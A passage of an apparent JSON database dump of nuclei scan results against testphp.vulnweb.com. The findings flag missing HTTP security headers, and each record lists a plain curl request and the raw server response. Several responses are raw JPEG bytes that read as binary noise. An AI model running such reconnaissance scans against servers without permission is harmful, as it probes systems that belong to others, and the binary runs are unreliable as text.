#&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< *��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� ���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 954, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:42:35.130Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:27 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 955, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:42:35.388Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:58 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 �5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 956, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:42:35.636Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 957, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:42:35.889Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:21 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , 